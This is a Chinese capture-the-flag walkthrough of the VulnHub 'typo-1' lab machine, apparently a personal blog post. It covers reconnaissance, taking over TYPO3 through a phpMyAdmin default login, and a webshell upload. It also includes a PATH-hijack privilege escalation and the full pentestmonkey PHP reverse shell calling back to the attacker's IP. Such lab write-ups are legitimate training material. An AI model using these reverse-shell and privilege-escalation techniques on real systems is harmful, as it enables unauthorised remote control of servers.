打靶-typo1

前言

环境地址:https://www.vulnhub.com/entry/typo-1,472/

kali IP:192.168.131.28

目的机ip :192.168.131.82

渗透过程

老规矩

虽然靶机给了ip,流程还是要走走的

1
arp-scan -l

image-20240806202457396

1
2
3
nmap -sV -A 192.168.131.82
sudo nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scan
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82

image-20240806202730091

访问80端口发现是typo3cms

image-20240806223552987

但是pagenotfound

dirsearch扫描发现了INSTALL.md文档,

image-20240806224046819

通过查看其中的网址来看

image-20240806224210733

安装更新路径在typo3/install.php

发现登录被锁

image-20240806224249265

访问index.php

发现了登录界面,尝试了几个弱密码发现失败

尝试一下其他端口,8080一个hello发现没啥,8081是phpmyadmin/

root root直接登录成功

image-20240806224538881我直接一手改管理员密码

1
$argon2id$v=19$m=65536,t=16,p=2$Q2E3NG1YeTE5NkkxSi5hMg$Hn5lqwQnbYjlnZMPahFHjEWhCDwOcbDKjg3RrTfrVuE

我也不知道是啥密码,问了一手GPT

1
2
3
4
5
6
7
8
#!/usr/bin/python3

from argon2 import PasswordHasher

ph = PasswordHasher()
hash = ph.hash('q1ngchuan')
print(hash)
//$argon2id$v=19$m=65536,t=3,p=4$avXnZDtGf4ulHoQrz5+hXw$B5w7eRbzxxwWrYcOx4wZ5qPTrrmit9yk//t6bvGNonU

更换后保存,登陆直接成功

到配置界面

image-20240806225827401

image-20240806225857816

清空内容,点Wirte

去找文件上传的点

image-20240806230101578

上传成功后

image-20240806230122830

点击小眼睛查看发现成功

之后连接蚁剑

接下来就是提权了

sudo -l 发现不行

试试suid提权

1
find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image-20240806230646221

说实话我看到这我也不知道哪个能提取,可疑的是ssh和apache

后面了解到

apache-restart会有service,服务重启是root权限,尝试执行apache-restart

尝试写service

1
2
3
4
5
echo 'cp /bin/bash /tmp/bash;chmod 777 /tmp/bash' > /tmp/service
chmod 777 /tmp/service
export PATH=/tmp:$PATH
apache2-restart
/tmp/bash -p

这里反应过来连蚁剑不行

利用php-reverse-shell.php文件上传后,访问自动触发shell

贴一下脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.131.28';  // CHANGE THIS
$port = 999;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

image-20240806232750699

总结

apache-restart服务提权,利用service写提权

反弹shell脚本php-reverse-shell.php注意利用